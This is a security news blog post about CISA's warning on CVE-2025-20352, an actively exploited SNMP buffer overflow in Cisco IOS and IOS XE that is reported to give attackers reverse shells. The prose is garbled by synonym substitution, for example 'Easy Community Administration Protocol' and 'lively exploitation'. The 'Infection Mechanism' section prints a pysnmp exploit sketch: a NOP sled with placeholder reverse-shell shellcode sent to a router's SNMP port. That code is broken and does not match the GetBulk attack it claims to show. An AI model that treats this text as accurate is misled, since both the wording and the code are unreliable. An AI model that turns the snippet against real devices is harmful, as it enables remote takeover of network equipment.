Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
CISA Warns of Cisco IOS and IOS XE SNMP Vulnerabilities Exploited in Attacks

CISA Warns of Cisco IOS and IOS XE SNMP Vulnerabilities Exploited in Attacks

Posted on October 1, 2025October 1, 2025 By CWS

Cisco’s Easy Community Administration Protocol (SNMP) implementations in IOS and IOS XE have come beneath intense scrutiny following studies of lively exploitation within the wild.

First disclosed in August 2025, CVE-2025-20352 describes a crucial buffer overflow within the SNMP engine that permits unauthenticated distant attackers to execute arbitrary code.

The vulnerability arises when an outsized payload is shipped in a GetBulk request, overrunning an inside buffer and redirecting management circulate to attacker-supplied shellcode.

Preliminary indicators emerged when community operators started noticing unexplained machine reboots and anomalous SNMP site visitors patterns.

Subsequent forensic evaluation revealed that compromised routers have been pinging exterior command-and-control servers instantly after dealing with malformed SNMP requests.

CISA analysts recognized this habits inside weeks of the vulnerability’s public disclosure, warning that adversaries are leveraging CVE-2025-20352 to determine persistent footholds in enterprise networks.

The influence spans a variety of Cisco platforms, from ISR 4000 Sequence routers to Catalyst switches operating IOS XE variations previous to 17.10.

Exploitation requires solely community reachability to the SNMP service and no legitimate credentials, making uncovered administration interfaces notably harmful.

In a single reported incident, attackers deployed a customized payload that established a reverse shell again to an attacker-controlled host, enabling full distant management of the machine.

An infection Mechanism

Beneath the hood, the assault leverages a malformed PDU that triggers an out-of-bounds write within the SNMP engine’s stack.

Upon receiving a GetBulk request with a size area exceeding the utmost buffer dimension, the SNMP handler fails to validate the message dimension.

This overflow overwrites the saved return handle on the stack, diverting execution to shellcode embedded within the packet.

As soon as execution begins, the payload initializes a socket connection again to the attacker’s IP handle:-

from pysnmp.hlapi import *
payload = b”x90″ * 100 + reverse_shell_shellcode
sendNotification(
SnmpEngine(),
CommunityData(‘public’),
UdpTransportTarget((‘192.0.2.123’, 161)),
ContextData(),
NotificationType(
ObjectIdentity(‘1.3.6.1.4.1.9.9.96’),
(‘1.3.6.1.4.1.9.9.96.1.1’, OctetString(payload))
)
)

The packet construction highlights how the outsized size area and embedded shellcode mix to hijack execution.

Community defenders are urged to use the newest Cisco patches instantly and to limit SNMP entry to trusted hosts solely.

Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Attacks, CISA, Cisco, Exploited, IOS, SNMP, Vulnerabilities, Warns

Post navigation

Previous Post: MatrixPDF Attacks Gmail Users Bypassing Email Filters and Fetch Malicious Payload
Next Post: OpenSSL Vulnerabilities Allow Private Key Recovery, Code Execution, DoS Attacks

Related Posts

Hackers Actively Exploiting 7-Zip RCE Vulnerability in the Wild Hackers Actively Exploiting 7-Zip RCE Vulnerability in the Wild Cyber Security News
Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code Cyber Security News
NCSC Urges Organizations to Upgrade Microsoft Windows 11 to Defend Cyberattacks NCSC Urges Organizations to Upgrade Microsoft Windows 11 to Defend Cyberattacks Cyber Security News
From SOC to SOAR Automating Security Operations From SOC to SOAR Automating Security Operations Cyber Security News
Hackers Leverage GitHub Notifications to Mimic as Y Combinator to Steal Funds from Wallets Hackers Leverage GitHub Notifications to Mimic as Y Combinator to Steal Funds from Wallets Cyber Security News
South Asian APT Hackers Using Novel Tools to Compromise Phones of Military-Adjacent Members South Asian APT Hackers Using Novel Tools to Compromise Phones of Military-Adjacent Members Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News